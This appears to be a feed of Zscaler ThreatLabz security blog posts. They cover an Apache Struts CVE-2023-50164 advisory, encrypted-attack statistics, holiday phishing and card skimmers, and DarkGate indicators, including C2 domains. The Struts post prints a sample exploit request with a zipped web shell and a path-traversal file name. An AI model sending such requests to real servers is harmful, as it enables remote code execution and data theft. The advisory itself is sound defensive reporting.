01b02fc9db22a60e8df6530a2e36a73b 43ec3cc0836bd759260e8cf120b79a7b 5477e3714c953df2bb3addf3bebbda9a be1858db74162408c29c8b8484b3cf88 38bb6b06907c6e3445aa23c8d229e542 05bc545b9b0de1ccb4254b59961ea07b 25a697d0e6c5fa06eea8ba0d3ae539da 8a081a4f6c497c60c6e72dfabfe30326 ad0f5f4994a2998f0e1ed3323884837c 092ff92d9bfa9cac81a8b892d495f42e 09f197fc8d69ec14875723f1e6e623bf 0eba69a4ad399db14a2743b4d68f13e8 19eab6a97cea19473bda3010066c5990 cb2b5646d68279aea516703df3c4c1e9 3247ad04996dd2966800153e7ea14571 92d1ece422670dbf9a3e1aef45612b5c f25da7cd5fb33e7a0967dbcdf008bd9a a7f2d131a2f3f61978ec17395f7b34b1 39088a9e4ad3e7a8ba4686641569dbcd 210e9a89b723b3246a7d590c9a428c83 efc3a41ecae822eba861cb88c179c80e c01e90db99bcc939f829a181aef2c348 b18ba839dfd653b07b984330dd85b57a a8e8d4667f96ea847d18eb7830fb1dc6 c38b8d525f48cbdf92381274059d8f0b 6e0dafacdeee6f2d9463d0052db5cce8 b6f892c73fa0f491072592d7baf0c916 bf9d9c9a95fdb861c583dc9b66bcf5ab 0043f65755a700b94a57118a672df82c adbf1e2f49d842aac524d7ac351ca5b4 d55bdb3593664d806794d00025390081 935e75cbd0f207bfeb6d3b5d90e35685 db4bfb57c7acd8d568a06a9c3739e146 08e1955de35005b335be2e100d2d4a3c e57882623add29cbfa8c93d011b52c44 e6c4636c331af09568a68dcf3614cfa4 be71e90f09a38adfe22d34e3dd044fad e9d4e5b8b80dcb4fcf5af8413066434e 413af1ff38e6a4e205c6f487d042b457 f1a1542bbccea9a4e6746040d85eae1b 05d60c7be299fc0220ffcaf3b1482652 5373b6dce20bbb0218034aa9bf0c20df 1e22cd428f5baf23877a8189469ed92a b76d8d59b53f58dd876951044e6d88b9 a29585da474f79a723894c1a56f65b85 2639c8b09f744e95ba612c89ef26e02c bba5761789159b5a1a23566506358c15 3d8414800762efb9276a999fc477211b f0af137175487b4d1249921ce506efe9 2123f750f5b854b439349576118d9b9d 7b6ec969d4110722b427de45ca1c0d42 6dfc461ecf4f2fe4c5f44cdeb6792226 0708c52198a49bc7ab16bce19472598a 00b28f548f14de4f53abd6651bf78b98 ea1472bad426efded678a15c9a14bf34 dadb38b97d45d7438fbd43911a71d844 d7ebf4ab7bb0ab685e3902349d637e9b aff1e141f15d808d5d4f549ea99c1e4d bbc7c66b301d3087cfdaa89528832895 e6926fc50f40c5c5feb676b0adcb7655 3c3580dfbc1f06636fe5696879cbdd85 b7dba4e30a73f58740d316c46645b759 7b1bc15873c39866b429d44da8640285 Agent Tesla pilfers data from the following browsers: Edge Chromium Postbox Iridium Browser Elements Browser Citrio, CentBrowser Epic Privacy SeaMonkey Vivaldi Yandex Browser Amigo 7Star Kometa IceCat Cool Novo Flock Coowon 360 Browser Brave WaterFox Chromium Liebao Browser CyberFox PaleMoon Thunderbird QIP Surf Sleipnir 6 Sputnik IceDragon Coccoc K-Meleon Comodo Dragon Chedot Opera Browser BlackHawk Firefox Torch Browser Uran Orbitum Agent Tesla tries to steal credentials from the following mail and FTP clients: Paltalk WinSCP Safari for Windows FTP Navigator Discord Falkon Browser Mailbird QQ Browser ClawsMail Pidgin Eudora FTPGetter Becky! eM Client IncrediMail JDownloader 2.0 Psi/Psi+ FoxMail FtpCommander Flock Browser FileZilla Outlook WS_FTP OpenVPN Private Internet Access IE/Edge SmartFTP DynDns Opera Mail Trillian CoreFTP MysqlWorkbench PocoMail Flash FXP UC Browser NordVPN Internet Downloader Manager Windows Mail App Tue, 19 dic 2023 11:17:52 -0800 Kaivalya Khursale Coverage Advisory for CVE-2023-50164: Apache Struts Path Traversal and File Upload Vulnerability Introduction On December 7, the Apache Software Foundation released Apache Struts versions and 2.5.33 to address a critical vulnerability currently identified as CVE-2023-50164, which is a path traversal flaw allowing a malicious file to be uploaded and potentially lead to Remote Code Execution (RCE) on affected versions of Apache Struts. Recommendations Zscaler ThreatLabz recommends users on Apache Struts software upgrade to versions Struts 2.5.33, Struts, or higher to avoid this vulnerability. Affected Versions The following versions of Apache Struts are affected by the vulnerability and should update immediately: Struts 2.0.0 - Struts 2.3.37 (EOL) Struts 2.5.0 - Struts 2.5.32 Struts 6.0.0 - Struts 6.3.0 Background CVE-2023-50164 is a path traversal flaw that allows a remote attacker to upload malicious files to vulnerable servers. After successful exploitation, an attacker can achieve Remote Code Execution (RCE) on the target server. An attacker exploiting such a vulnerability can access, upload, or modify important files, steal sensitive information, disrupt critical services, or move laterally on the breached network. CISA released an alert to upgrade to the latest version of Apache Struts for protection from this vulnerability. According to the Shadowserver scanning platform, some threat actors may have started exploiting publicly exposed vulnerable Apache Struts servers. In addition, a post by Akamai indicates that attackers may be adding new arguments and modifying a publicly available Proof-of-Concept (PoC) to further exploit CVE-2023-50164. How It WorksThe attacker accesses a vulnerable version of Apache Struts to send an HTTP POST request to upload a malicious file. In the POST request, the attacker uploads a file with malicious content using the 'Upload' parameter name (instead of 'upload'). Within the same request, the attacker adds another parameter named 'uploadFileName' (instead of 'UploadFileName'). The sample below is a condensed example of a"Upload"; filename="arbitrary.txt" … PK.........B.W............ ...META-INF/......PK..............PK.........B.W................META-INF/MANIFEST.MF.M..LK-.. K-*....R0.3..r.JM,IM.u.. ....Y*h..&e&.i.r.r..PK.....97...6...PK.........8.W................webshell.jspmQ.N.0....c...5...1&.HL....4e`.Pj)....;.\[.3.&?e....A|.m..(............;.T.w...=:...D..n{o{O..M.......L_...Gx1..TJ.....m!v.U.u`.w.....V.+. .P....j:Ez.q..%:,.(.t..A..+..(7...C... r.....?.t..yX...j*..!o....c~. [email protected])........'.!..8..)..PK....=n........PK...........B.W............ .................META-INF/....PK...........B.W...97...6.................=...META-INF/MANIFEST.MFPK...........8.W..=n..........................webshell.jspPK.................... ------WebKitFormBoundaryp72D9I30enbR6scA Content-Disposition: form-data; name="uploadFileName" ../../opt/tomcat/webapps/webshell.war ------WebKitFormBoundaryp72D9I30enbR6scA--The 'uploadFileName' parameter contains path traversal characters (../), which manipulate the filename present in the ‘Upload’ parameter, allowing an attacker to bypass the built-in check – effectively evading the getCanonicalName method (a method used to truncate '/' & '\' characters in the filename) — and leave the path traversal payload in the final filename. From here, the file (with the malicious payload) is uploaded to the attacker’s chosen directory.If the file contains WebShell code, the attacker can escalate access to the vulnerable server, leading to RCE and ultimately gaining access to the target server.Figure 1: The attack chain depicting an attacker exploiting CVE-2023-50164.Zscaler Best Practices Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on. Route all server traffic through Zscaler Private Access™ with additional application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware. Extend command-and-control (C2) protection to all ports and protocols with the Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox™ to prevent unknown malware from being delivered as part of a second-stage payload. Inspect all TLS/SSL traffic and restrict traffic to the critical infrastructure from the allowed list of known-good destinations. Conclusion Addressing CVE-2023-50164 is crucial for protecting the digital security of Apache Struts systems and users. By manipulating file upload parameters, uploading malicious files, and achieving RCE on the target server, an attacker can take control — stealing sensitive information, leading to severe disruptions for impacted systems and users. To mitigate this risk, upgrade vulnerable Apache Struts software systems to Struts 2.5.33, Struts, or higher. Zscaler Coverage The Zscaler ThreatLabz team has deployed protection for the CVE. Zscaler Advanced Threat Protection HTML.EXPLOIT.CVE-2023-50164 Zscaler Private Access AppProtection Local File Inclusion: 930100 - Path Traversal Attack (/../) - Encoded Payload Local File Inclusion: 930110 - Path Traversal Attack (/../) - Decoded Payload Details related to these signatures can be found in the Zscaler Threat Library. References Mon, 18 dic 2023 08:55:37 -0800 Nishant Gupta Explorar los ataques cifrados en medio de la revolución de la IA Introducción Los investigadores de Zscaler ThreatLabz analizaron 29,800 millones de amenazas bloqueadas integradas en el tráfico cifrado desde octubre de 2022 hasta septiembre de 2023 en la nube de Zscaler, y presentaron sus conclusiones en el informe Zscaler ThreatLabz 2023 State of Encrypted Attacks Report. Además de las amenazas bloqueadas, este informe aprovecha los conocimientos de 500 billones de señales diarias y 360 mil millones de transacciones diarias en el Zscaler Zero Trust Exchange™. En esta entrada de blog, expondremos los hallazgos clave del informe. Ataques encriptados Según el Informe de Transparencia de Google 1, el tráfico cifrado experimentó un aumento significativo en la última década, alcanzando el 95 % del tráfico mundial en la actualidad, en comparación con el 48 % en diciembre de 2013. No es de extrañar que el tráfico cifrado, antes considerado como la opción segura para las actividades en línea, ahora también albergue la mayoría de las amenazas cibernéticas, como el malware, las estafas de phishing y las fugas de datos. El 85.9 % de los ataques están cifrados Casi el 86 % de los ataques utilizan canales cifrados en varias etapas de la cadena de eliminación. Desde las fases iniciales del phishing y la distribución de malware hasta las sutilezas de las actividades de comando y control, así como la exfiltración de datos, los ciberdelincuentes aprovechan el cifrado para ocultar sus intenciones. Para combatir esto, Zscaler recomienda a las organizaciones inspeccionar proactivamente todo el tráfico cifrado para detectar, descifrar y frustrar estos ataques. El 78.1 % de las amenazas cifradas se deben a malware Los ciberdelincuentes ocultan una variedad de amenazas en el tráfico cifrado. Sin embargo, el malware sigue siendo el tipo de amenaza predominante y comprende el 78.1 % de los ataques cifrados bloqueados por la nube de Zscaler, incluidos scripts maliciosos, cargas útiles, contenido web, sitios web y archivos adjuntos de correo electrónico. Cifra 1: Distribución de amenazas cifradas El aumento de los bloques de malware cifrado resalta la tendencia en la que estos autores de amenazas intentan establecer un punto de apoyo inicial en el entorno de la víctima evadiendo las tecnologías de detección heredadas que a menudo tienen dificultades para inspeccionar el tráfico TLS a escala. El phishing aumentó un 13.7 % Es probable que el crecimiento observado en los ataques de phishing se deba a la disponibilidad de herramientas de IA y servicios de phishing plug-and-play (también conocidos como ofertas de phishing como servicio) que facilitan en gran medida la ejecución de campañas de phishing.  Entre las marcas más afectadas por el phishing se encuentran las siguientes cinco: Microsoft OneDrive SharePoint Adobe Amazon, Amazon Cifra 2: Campaña de phishing con temática de Adobe  La industria manufacturera sigue siendo el sector más atacado La industria manufacturera sigue siendo la industria más atacada, experimentando el 31.6 % de los ataques cifrados. Cifra 3: Una tabla que muestra las tendencias de ataques cifrados por industria  Los fabricantes también registraron la mayor cantidad de transacciones relacionadas con la IA/ML en comparación con cualquier otro sector, procesando más de 2,100 millones de transacciones relacionadas con la IA/ML. A medida que las fábricas inteligentes y el Internet de las cosas (IoT) se imponen en la industria manufacturera, la superficie de ataque se amplía y expone al sector a más riesgos de seguridad, creando puntos de entrada adicionales que los ciberdelincuentes pueden aprovechar para interrumpir la producción y las cadenas de suministro. El uso de conocidas aplicaciones de IA generativa, como ChatGPT, en dispositivos conectados en la fabricación aumenta el riesgo de fuga de datos sensibles a través de canales encriptados. Zscaler protege a las organizaciones contra ataques cifrados a escala La principal conclusión del informe es la siguiente: si no está examinando los canales cifrados, no sabe si está sufriendo fugas de datos o si están entrando en su entorno amenazas avanzadas. Para ayudar a nuestros clientes a mantenerse seguros, Zscaler bloqueó casi 30,000 millones de amenazas en canales cifrados en 2023, un aumento del 24.3 % con respecto a los 24,000 millones bloqueados en 2022. Hoy en día, la mayoría de los ataques aprovechan el cifrado SSL o TLS, cuya inspección a escala requiere muchos recursos y se realiza mejor con una arquitectura proxy nativa de la nube. Aunque los firewalls heredados admiten el filtrado de paquetes y la inspección de estado, sus limitaciones de recursos los hacen poco adecuados para esta tarea. Esto genera una necesidad crítica de que las organizaciones implementen arquitecturas nativas de la nube que admitan la inspección completa del tráfico cifrado en consonancia con los principios de confianza cero. Figura 4: La inspección TLS proporciona una visibilidad total para bloquear las amenazas avanzadas Cómo ayuda Zscaler a mitigar los ataques cifrados Deepen Desai, director de seguridad de Zscaler, dice: "Aunque el 95 % del tráfico web está cifrado con HTTPS, estamos viendo que la gran mayoría de las amenazas se propagan ahora a través de canales cifrados. Como resultado, todo el tráfico cifrado con SSL/TLS que no se someta a una inspección en línea para defenderse de toda la variedad de amenazas puede suponer un riesgo importante para las organizaciones globales."  Desai recomienda las siguientes soluciones para proteger su organización de ataques cifrados en forma constante: Acceso a la red de confianza cero (ZTNA) - Interrumpa tantas etapas de esta cadena de ataque como sea posible, maximizando sus posibilidades de detener el ataque incluso si los actores de la amenaza evaden algunos de sus controles de seguridad. Yo recomiendo sustituir los dispositivos vulnerables, como las VPN y los firewalls, por ZTNA para inspeccionar y escanear el 100 % del tráfico SSL/TLS. Zscaler Private Access (ZPA) - Implemente una seguridad consistente con una segmentación mejorada, conectando a los usuarios a las aplicaciones, no a toda la red. ZPA está diseñado para proporcionar un acceso seguro y directo de los usuarios a aplicaciones específicas, asegurando que el tráfico de red esté segmentado, y los usuarios no tengan acceso a toda la red. Zscaler Cloud Data Loss Prevention (DLP) - Integre Zscaler Cloud DLP como una tecnología de prevención de pérdida de datos en línea con inspección TLS completa para evitar la fuga de datos sensibles. Mejores prácticas para mitigar ataques cifrados Su estrategia de ciberseguridad debe incluir controles para cada una de estas etapas: Minimice la superficie de ataque haciendo que las aplicaciones internas sean invisibles para Internet. Evite el compromiso utilizando una arquitectura proxy nativa de la nube para inspeccionar todo el tráfico en línea y a escala, aplicando políticas de seguridad congruentes. Detenga el movimiento lateral conectando a los usuarios directamente a las aplicaciones (en lugar de a la red) para reducir la superficie de ataque, y contenga las amenazas utilizando el engaño y la segmentación de la carga de trabajo. Detenga la pérdida de datos inspeccionando todo el tráfico que circula por Internet, incluidos los canales encriptados, para evitar el robo de datos. Si desea minimizar el riesgo de ataques cifrados para su organización, debería tener en cuenta estas recomendaciones como parte de su estrategia de adopción: Utilice una arquitectura nativa de la nube basada en proxy para descifrar, detectar y prevenir amenazas en todo el tráfico cifrado a escala. Aproveche un sandbox con IA para poner en cuarentena los ataques desconocidos y detener el malware de paciente cero. Inspeccione todo el tráfico, todo el tiempo, independientemente de si un usuario está en casa, en la oficina central o en movimiento, para garantizar que todos estén protegidos de manera uniforme contra las amenazas cifradas. Termine cada conexión para permitir que una arquitectura de proxy en línea inspeccione todo el tráfico, incluido el cifrado, en tiempo real, antes de que llegue a su destino, para evitar el ransomware, el malware y otros ataques. Proteja los datos mediante políticas granulares basadas en el contexto, verificando las solicitudes de acceso y los derechos en función del contexto. Elimine la superficie de ataque conectando a los usuarios directamente a las aplicaciones y recursos que necesitan, nunca a las redes. Buenas prácticas para interacciones seguras de IA/ML Teniendo en cuenta el rápido avance y la adopción de aplicaciones que utilizan la IA, es vital establecer y seguir las mejores prácticas para garantizar el uso responsable y seguro de estas tecnologías transformadoras. Las organizaciones deben adaptar de forma proactiva sus políticas de uso y seguridad de la IA para anticiparse a los posibles riesgos y desafíos.  Implemente la inspección TLS para aplicaciones públicas de chatbot de IA como ChatGPT utilizando políticas DLP granulares para evitar la fuga de datos sensibles. Asegúrese de que el uso de las herramientas de IA cumpla todas las leyes y normas éticas pertinentes. Esto incluye regulaciones de protección de datos y leyes de privacidad. Establezca una responsabilidad clara para el desarrollo y la implementación de las herramientas de IA. Defina las funciones y responsabilidades dentro de su organización para supervisar los proyectos de IA. El desarrollo y la integración de las herramientas de IA deben seguir un Marco Seguro del Ciclo de Vida del Producto para garantizar el máximo nivel de seguridad. Más información Descargue su copia del informe completo sobre el estado de los ataques cifrados de Zscaler ThreatLabz 2023 para obtener más información y consejos para gestionar los ataques cifrados.  1. Thu, 14 dic 2023 10:01:01 -0800 Deepen Desai Cyber attacks during the holidays: Tips and Trends Introduction Threat actors are always ready to exploit major events and holidays, launching various cyber attacks to target online users. Between November 19th and November 24th of 2023 (essentially, Black Friday, Thanksgiving, and Cyber Monday), Zscaler ThreatLabz observed a spike in phishing, malware, and scam campaigns. In this blog, we examine these cyber attack campaigns, present an analysis of e-commerce traffic trends, and provide guidelines to avoid phishing scams and stay safe while holiday shopping. Key Takeaways To avoid holiday online shopping scams, only use official retail applications, closely examine any unauthorized transactions, and keep devices up-to-date with the latest security patches. Threat actors entice users with urgent phishing themes to steal credentials. Mobile users are often a target because mobile devices make it more difficult to inspect URLs and are not always secured with antivirus software or a secure access service edge (SASE) framework. Payment card skimming attacks continue to pose a significant threat to e-commerce stores because they leverage the existence of known and legitimate businesses. Threat actors are leveraging legitimate services for scam and phishing campaigns to bypass reputation-based detection and prey on users’ innate trust in a known service. How to Avoid Online Scams Follow the guidelines below to stay protected from the online cyber attacks: Only download apps from official application stores, such as Google or Apple, and avoid unofficial mobile application stores. Use only legitimate e-commerce websites and make sure you are utilizing HTTPS/secure connections. Contact banking authorities if you notice any unauthorized payments made using your payment card. Don’t fall for exciting “too good to be true” offers from unknown sources. Take a good look at URLs and website addresses, and verify their authenticity before you click on a link. Stay away from emailed invoices — this is often a social engineering technique used by cybercriminals. Always ensure that your operating system and web browser have the latest security patches installed. Online Shopping Trends: November 19-24 ThreatLabz observed a 244% increase in global online shopping transactions between November 19th and November 24th. Within the United States, ThreatLabz saw a 136% increase in online shopping transactions during that same time period. It turns out that Black Friday (November 24th) is the most popular day for online shopping in the United States, with online shopping activity gaining speed at 9am GMT and peaking at 4pm GMT. Threat Campaigns Observed Over the Holiday Weekend Case 1: Phishing Microsoft Phishing Page Threat actors lure users into clicking fraudulent links and/or downloading malicious attachments by distributing phishing emails branded to look like familiar themes. In most cases, these phishing emails relate to pending payments, invoices, order details, parcel tracking, etc. — subjects that are likely to elicit a response from users. Recently, the ThreatLabz team analyzed a Microsoft-themed phishing campaign where the user receives an email with an HTML attachment and a subject related to an “order update” as shown in Figure 1. Figure 1: Phishing email about an “order” designed to entice a user to open an HTML attachment containing a phishing page If the user enters their Microsoft credentials, this fraudulent Microsoft login phishing page (shown in Figure 2) sends those credentials to an attacker-controlled domain. Figure 2: Microsoft phishing page with a Black Friday theme USPS Phishing Page We observed another phishing campaign that leveraged the United States Postal Service (USPS) brand to target mobile users as shown in Figure 3. In this campaign, threat actors distributed a USPS phishing page to mobile users, encouraging them to pay for a missing package — thereby obtaining sensitive payment information. Interestingly, we observed that some of the USPS phishing pages can only be accessed through a mobile device. If users on other devices try to access the phishing page, they are redirected to the legitimate USPS website. In addition, many of the domains hosting these phishing pages were newly registered, which can sometimes indicate the malicious nature of a domain. Figure 3: Fake USPS page displayed on a mobile device The Click Update button on the landing page redirects users to another fraudulent page where users are asked to provide their address details as shown in Figure 4. The other buttons on the landing page redirect users to the legitimate USPS website. Figure 4: Fake USPS website asking for payment and address details After the user enters their address, they are redirected to a payment page. On the payment page, the user is asked to enter payment details. Once the phishing page acquires the user’s payment method details and Personal Identifiable Information (PII), like their address, the data is sent to an attacker-controlled domain. Case 2: Card Skimmers As the holiday shopping season starts, various e-commerce stores offer large discounts to attract shoppers. Unfortunately, this also attracts threat actors who see this as an opportunity to compromise the website to steal user payment information. Every year, we observe a spike in card skimmer attacks between November 19th and November 24th. Threat actors inject malicious scripts into legitimate e-commerce websites and use different techniques to remain undetected for long periods. These techniques include: Using newly registered domains and legitimate services for data exfiltration Injecting malicious code through another compromised legitimate website Injecting malicious code only on the payment page ThreatLabz observed a card skimming attack on an e-commerce website related to a Black Friday sale as shown in Figure 5. In this campaign, an e-commerce website was injected with a malicious skimmer script that exfiltrated payment details from online shoppers trying to take advantage of Black Friday deals. The skimmer script is heavily obfuscated and employs multiple functions to avoid detection and analysis. Figure 5: Compromised e-commerce website The skimmer script shown in Figure 6: Features anti-debugging capabilities to detect if developer tools are opened, which, if detected, causes the script to exit Checks if the current URL has keywords like “checkout”, “cart”, “step”, “confirm”, and “order” to verify if the user is ready to make a purchase and enter payment information Exfiltrates sensitive data (i.e. payment details), encodes it in Base64, and transmits it to the attacker Figure 6: A snapshot of the malicious skimmer code injected into the website In another case, ThreatLabz detected an e-commerce website being compromised by threat actors who injected a malicious payment card skimmer script into the website and tried to exfiltrate card details to a newly registered domain as shown in Figure 7. Figure 7: A snapshot of the malicious skimmer code injected into the website The payment card skimmer script has the following capabilities: Collects data from all the input, select, and textarea fields using the onchange event and adds the data to an array Calls the data collection function after 1.5 seconds using the setInterval() function Creates an HTML image element with the height and width of 1px Calls the image source URL, which is really the data exfiltration URL, and then appends the stolen data to the image in a Base64 encoded format Case 3: Scam Campaigns Our team encountered several newly registered shopping websites that attempted to look like familiar and legitimate brands, thereby gaining the trust of online shoppers and facilitating online scams. These deceptive websites tend to offer massive discounts and create a sense of urgency, pressuring online shoppers to make hasty decisions without considering potential risks. An example is shown in Figure 8. Figure 8: A screenshot of a fake shopping website resembling Magalu, a legitimate Brazilian retailer When users proceed to purchase an item, they are directed to make payments through Pix payment applications — an established payment method in Brazil. After the payment is made, users are asked to send payment proof via email to “Magalu” to secure their item (shown in Figure 9). In reality, the Pix payment information is being sent to an email address controlled by the attacker. Figure 9: A screenshot of the fraudulent request to share Pix transaction details In another scam, threat actors used legitimate services like Google Forms to lure users with discount offers, only to steal payment card details (shown in Figure 10). Using legitimate services allows the threat actors to avoid reputation-based detection and remain active for longer periods of time. Figure 10: A screenshot of a scam Google Form page used to lure users with Black Friday offers In the screenshot below, threat actors ask users to provide credit card information to make reservations and mention that the card details will be encrypted. Figure 11: A screenshot of the payment card details the user is asked to enter into a Google Form page Conclusion As we wrap up one holiday shopping season and head into another, it’s crucial to reflect on potential cyber threats. To ensure a secure online shopping experience, pay close attention to unauthorized account activity, double-check the legitimacy of website addresses, and utilize official applications and websites to shop online. These online shopping recommendations can be carried into the winter holiday to ensure a safe and joyful season. Holiday season or not, the Zscaler ThreatLabz team is actively tracking campaigns targeting online shoppers and providing coverage to ensure that our customers are protected from these kinds of attacks. Zscaler Coverage Advanced Threat Protection Signatures JS.POS.Magecart JS.Downloader.Magecart HTML.Phish.Microsoft.LZ HTML.Phish.USPS HTML.Phish.Gen.LZ HTML.Phish.Gen.NU Mon, 11 dic 2023 09:34:27 -0800 Prakhar Shrotriya Recent DarkGate Activity & Trends Introduction DarkGate is a malware family, dating back to 2018, that gained prominence after the demise of Qakbot with a Malware-as-a-Service (MaaS) offering advertised in underground cybercrime forums starting in the summer of 2023. This blog examines DarkGate intrusion trends observed by ThreatLabz between June and October 2023. Key Takeaways DarkGate activity surged in late September and early October 2023. According to our customer telemetry, the technology sector is the most impacted by DarkGate attack campaigns. Most DarkGate domains are 50 to 60 days old, which may indicate a deliberate approach where threat actors create and rotate domains at specific intervals. Trend 1: DarkGate activity surges in late September, early October To better understand DarkGate distribution trends, the ThreatLabz team analyzed hostnames, registration information, IP addresses, website content, and any recent patterns that emerged. Increase in DarkGate domains Our analysis revealed that there was a significant rise in the number of active DarkGate domains during the last week of September 2023. This means that more DarkGate websites associated with illegal activities were active during this specific time period. Uptick in DarkGate transactions DarkGate transactions increased in late September and into October. Notably, there was a substantial spike in transactions on October 10, 2023. This suggests that the threat actors behind Darkgate were particularly active during this time, possibly executing a series of attacks. This DarkGate transaction data was compiled by observing the Zscaler cloud. Each time an infected machine made contact with a C2 server was counted as a transaction. Figure 1: Illustrates spikes in DarkGate command-and-control (C2) activity by date Trend 2: Technology sector most targeted by DarkGate Based on analysis of our customer telemetry, the technology industry is the most targeted by DarkGate at 36.7%. Food, beverage, and tobacco come in second at 12.7%. Figure 2: Industries most targeted by DarkGate Trend 3: Most DarkGate domains are 50 to 60 days old ThreatLabz found a concentrated level of activity (such as serving websites, handling transactions, or participating in network communications) among hostnames that have been in existence for 50-60 days. The fact that DarkGate domains follow this pattern could indicate that threat actors are taking a systematic approach where they create and rotate domains at specific intervals. Most likely, this intentional pattern perpetrated by threat actors is a way of evading security measures that target known malicious domains. Figure 3: Age distribution of DarkGate domains based on transaction volume Conclusion The recent surge in DarkGate's activity can be attributed to its use as a replacement for Qakbot. In addition to staying on top of the threat of DarkGate malware, Zscaler's ThreatLabz team continuously monitors for new and emerging threats and shares its findings with the wider security community. Zscaler Coverage & Indicators of Compromise (IOCs) Zscaler's multilayered cloud security platform detects indicators related to DarkGate at various levels. Zscaler Sandbox played a particularly crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. Zscaler’s advanced threat protection capabilities and comprehensive zero trust approach empowers cybersecurity professionals with critical insights into malware behavior, enabling them to effectively detect and counter the threats posed by malicious actors. Win64.Downloader.DarkGate Win32.Trojan.DarkGate Win64.Trojan.DarkGate LNK.Downloader.DarkGate VBS.Downloader.DarkGate JS.Downloader.DarkGate Figure 4: Zscaler Cloud Sandbox MITRE ATT&CK TTP’s Tactic Technique ID Technique ID Initial Access T1566 Phishing Execution T1204 T1059 T1569 User Execution Command and Scripting Interpreter System Services Persistence T1547 Boot or Logon Start Execution Defense Evasion T1027 T1070.004 T1202 T1564.001 T1140 Obfuscated Files or Information File Deletion Indirect Command Execution Hidden Files and Directories Deobfuscate/Decode Files for Information Credential Access T1555.003 Credentials from Web Browsers Discovery T1016 T1083 T1057 T1082 System Network Configuration Discovery File and Directory Discovery Process Discovery System Information Discovery Command and Control T1071 Application Layer Protocol Indicators of Compromise (IoCs) Phishing PDF: 55f16d7f0a1683f32b946c03bdda79ca Malicious DLL: a2fb0b0d34d71073cd037e872d40ea14 Encoded AutoIt Script: 0ea7d1a7ad1b24835ca0b2fc6c51c15a AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd DarkGate Payload: f242ce468771de8c7a23568a3b03a5e2 Malicious ZIP: d2efccdb50c7450e8a99fec37a805ce6 LNK File: 7791017a97289669f5f598646ef6d517 Phishing PDF: 803103fe4b32c86fb3f382ee17dfde44 Malicious ZIP: 0a341353e5311d8f01f582425728e1d7 VBS File: 3df59010997ed2d70c5f7095498b3b3f Encoded AutoIt Script: 660bc32609a1527c90990158ef449757 AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd DarkGate Payload: 9bf2ae2da16e9a975146c213abd7cd4f Malicious ZIP: 9f93952e425110de34e00ebd6d6daab3 VBS File: c78dfe0f9b4fd732c8e99eb495ed9958 Encoded AutoIt Script: 660bc32609a1527c90990158ef449757 AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd DarkGate Payload: 9bf2ae2da16e9a975146c213abd7cd4f Malicious ZIP: 54e65e96d2591106a2c41168803c77ff JS File: 57cfc3b0b53e856c78b47867d7013516 Phishing Email: 0a50d4ea1a9d36f0c65de0e78eacbe95 PDF document: 097cbe9af6e66256310023ff2fbadac6 Malicious CAB File: 6ecd98dfd52136cff6ed28ef59b3f760 MSI File: 8ef6bc142843232614b092fac948562d CAB file dropped from MSI: a169cebb4009ecfb62bb8a1faf09182f Command-and-control (C2) ​​luxury-event-rentals[.]com drvidhya[.]in alianzasuma[.]com[.]py corialopolova[.]com skylineprodutora[.] medsure[.] humanrecruitasia[.]com journeotravel[.]com[.]br ahantadevnet[.]org yellowstone[.] asiaprofessionals[.]net axecapital[.]ro semquedagotas[.] reverasuplementos[.]fun tikwave[.]site grupec[.] chatpipoca[.]net ncsinternationalcollege[.]com[.]pk ibuytech[.]pk winstonandfriendz[.]ca skincaremulher[.]fun[.]id[.]my japaaesthetics[.]com msteamseyeappstore[.]com youth[.]digital roundstransports[.]com[.]ar fefasa[.]hn nile-cruiise-egypt[.]com flyforeducation[.]com expertaitalia[.]eu plataformaemrede[.] runnerspacegifts[.]com/umn/ kiwifare[.]net getldrrgoodgame[.]com hmas[.]mx darkgate[.]com 94.228.169[.]143[:]2351/ 94.228.169[.]143[:]8080/ grupowcm[.]com[.]br thekhancept[.]com eelontech[.]com bligevale[.]co[.]zw dhtech[.]ae techs[.]com gsrhrservices[.]com glowriters[.]com a2zfortextile[.]com alpileannn[.]com boutiquedhev[.]com hypothequeswestisland[.]com onetabmusic[.]com sirishareddy[.]info appapi[.]store sictalks[.]com nia-dbrowntestserver[.]com[.]ng ofc[.]ai unasd[.]org plusmag[.]ro beautifullike[.]com gsrglobal[.]org winstonandfriendz[.]ca divinfosystem[.]com supershuttles[.]co[.]za ziaintegracion[.]com themarijuanashow[.]com blackshine[.]lk deroze[.]net vtektv[.]com dna-do-gamer[.]com kalismprivateltd[.]co[.]uk arshany[.]com kelotecnologia[.]com millennialradio[.]es Mon, 04 dic 2023 10:54:22 -0800 Shatak Jain ThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 2 Introduction In Part 1 of this series, we’ve demonstrated how ThreatLabz reverse engineered the SketchUp 3D library in Microsoft 365 as well as the SKP file format. Furthermore, we developed two effective fuzzing harnesses. Microsoft published CVE-2023-28285 and CVE-2023-29344 (in April and May of 2023, respectively) to address the vulnerabilities identified by the Zscaler ThreatLabz research team. The ThreatLabz research team analyzed the patch for CVE-2023-29344 and discovered a bypass, which in turn, led to Microsoft addressing the vulnerabilities through CVE-2023-33146. In this blog, we examine how it was possible to bypass CVE-2023-29344. In addition, we analyze real-world case studies to gain further insight into how these vulnerabilities impact security. How to Bypass CVE-2023-29344 Watch the video In the following video, we show how CVE-2023-29344 can be bypassed, which led to the release of CVE-2023-33146. Read the write-up In May of 2023, the patch for CVE-2023-29344 was released and was intended to fix all vulnerabilities located in FreeImage. The patched version of MSOSPECTRE.DLL is 16.0.16327.20240, as shown in the figure below. Figure 1: The patched version of MSOSPECTRE.DLL for CVE-2023-29344 First, let’s explore the details of the patch for CVE-2023-29344. The figure below shows the comparison of SketchUpModelReader::ReadModel before and after the patch. Figure 2: The comparison of SketchUpModelReader::ReadModel before and after the patch. This patch introduced some code changes to disable support for SKP files with the MFC type. This is because all vulnerabilities in FreeImage were reported to Microsoft through the SKP files with the MFC type. Accordingly, Microsoft 